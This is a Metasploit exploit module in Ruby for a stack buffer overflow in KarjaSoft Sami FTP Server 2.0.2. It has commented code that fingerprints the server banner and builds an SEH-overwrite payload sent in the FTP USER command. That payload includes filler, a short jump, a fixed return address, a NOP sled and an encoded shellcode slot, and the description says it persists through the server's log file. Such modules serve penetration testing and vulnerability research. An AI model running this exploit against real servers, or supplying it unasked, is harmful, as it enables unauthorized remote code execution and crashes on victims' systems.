##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
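# Remote SEH-overwrite exploit module for KarjaSoft Sami FTP Server 2.0.2.
#
# The module has two entry points used by the framework:
# - `check`   fingerprints the service from its greeting banner (no payload sent);
# - `exploit` delivers the overflow in the FTP USER command and starts the handler.
#
# Note: this file must NOT carry `# frozen_string_literal: true` — `exploit`
# builds its buffers by appending to string literals with `<<`.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh
  prepend Msf::Exploit::Remote::AutoCheck

  # Register module metadata and options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'KarjaSoft Sami FTP Server v2.0.2 USER Overflow',
        'Description' => %q{
          This module exploits an unauthenticated stack buffer overflow in
          KarjaSoft Sami FTP Server version 2.0.2 by sending an overly long
          USER string during login.

          The payload is triggered when the administrator opens the application
          GUI. If the GUI window is open at the time of exploitation, the
          payload will be executed immediately. Keep this in mind when selecting
          payloads. The application will crash following execution of the
          payload and will not restart automatically.

          When the application is restarted, it will re-execute the payload
          unless the payload has been manually removed from the SamiFTP.binlog
          log file.

          This module has been tested successfully on Sami FTP Server versions:
          2.0.2 on Windows XP SP0 (x86);
          2.0.2 on Windows 7 SP1 (x86);
          2.0.2 on Windows 7 SP1 (x64); and
          2.0.2 on Windows 10 (1909) (x64).
        },
        'Author' => [
          'Muhammad Ahmed Siddiqui', # Discovery
          'Critical Security', # Perl exploit
          'n30m1nd', # Python exploit - SEH overwrite with 2.0.2 universal tmp01.dll p/p/r
          'aushack', # Metasploit
          'bcoles' # Metasploit
        ],
        'Arch' => [ ARCH_X86 ],
        'License' => MSF_LICENSE,
        'References' => [
          # This vulnerability appears to have been reported multiple times.
          ['CVE', '2006-0441'],
          ['CVE', '2006-2212'],
          ['OSVDB', '25670'],
          ['BID', '16370'],
          ['BID', '22045'],
          ['BID', '17835'],
          ['EDB', '1448'],
          ['EDB', '1452'],
          ['EDB', '1462'],
          ['EDB', '3127'],
          ['EDB', '3140'],
          ['EDB', '40675']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'seh'
        },
        'Platform' => ['win'],
        'Privileged' => false,
        'Payload' => {
          # Space must agree with the 800-byte padding arithmetic in `exploit`.
          'Space' => 800,
          'BadChars' => "\x00\x0a\x0d\x20\xff",
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed
        },
        'Targets' => [
          ['Sami FTP Server version 2.0.2', { 'Ret' => 0x10022ADE }], # p/p/r tmp01.dll
        ],
        'Notes' => {
          # The service does not recover on its own after the payload runs.
          'Stability' => [ CRASH_SERVICE_DOWN ],
          'Reliability' => UNKNOWN_RELIABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        },
        'DisclosureDate' => '2006-01-24'
      )
    )

    register_options([
      Opt::RPORT(21)
    ])
  end

  # Fingerprint the service from its FTP greeting banner.
  #
  # Only the banner is read; nothing is sent. The read is bounded by a
  # 3-second timeout and the socket is always released in `ensure`, so a
  # read failure cannot leak the connection. `get_once` yields nil on
  # timeout/EOF, so the result is coerced with `to_s` before matching —
  # the original `banner.include?` raised NoMethodError on a silent port.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when no banner was received,
  #   Safe when the banner is not Sami FTP Server, Appears for version
  #   2.0.2, otherwise Detected.
  def check
    begin
      connect
      banner = sock.get_once(-1, 3).to_s
    ensure
      disconnect
    end

    return CheckCode::Unknown('No banner received from the target') if banner.empty?

    unless banner.include?('Sami FTP Server')
      return CheckCode::Safe('Target is not Sami FTP Server')
    end

    if banner.include?('Sami FTP Server 2.0.2')
      return CheckCode::Appears('Sami FTP Server version 2.0.2.')
    end

    CheckCode::Detected
  end

  # Deliver the overflow in the USER argument and start the payload handler.
  #
  # Buffer layout (all sizes are from this method and the 'Payload' metadata):
  #   596 bytes filler | nSEH (2-byte short jump + 2 bytes) | SEH = target Ret |
  #   10 NOPs | encoded payload | NOP padding up to the 800-byte payload space.
  # The whole argument is 1414 bytes long, which is what print_status reports;
  # a USER line of that length is itself a clear wire-level indicator for
  # network monitoring.
  #
  # Side effects: opens and closes one TCP connection and, per the module
  # description, the overflow persists in SamiFTP.binlog on the target.
  def exploit
    connect

    # nSEH: "\xeb\x06" is a short jump over the 4-byte SEH handler pointer
    # into the NOP sled that follows; the two random alpha bytes are filler.
    nseh = "\xeb\x06"
    nseh << rand_text_alpha(2)
    # SEH handler overwritten with the target's Ret (little-endian, 32-bit).
    seh = [target.ret].pack('V')

    user = rand_text_alpha(596)
    user << nseh
    user << seh
    user << "\x90" * 10
    user << payload.encoded
    # Pad to exactly the declared 800-byte payload space.
    user << "\x90" * (800 - payload.encoded.length)

    print_status("Sending payload (#{user.length} bytes) ...")
    sock.put("USER #{user}\r\n")
    sock.recv(4096)

    # A single-character PASS (chosen outside BadChars) completes the login
    # exchange; its value is irrelevant to the overflow.
    sock.put("PASS #{Rex::Text.rand_char(payload_badchars)}\r\n")
    sock.recv(4096)

    handler
    disconnect
  end
end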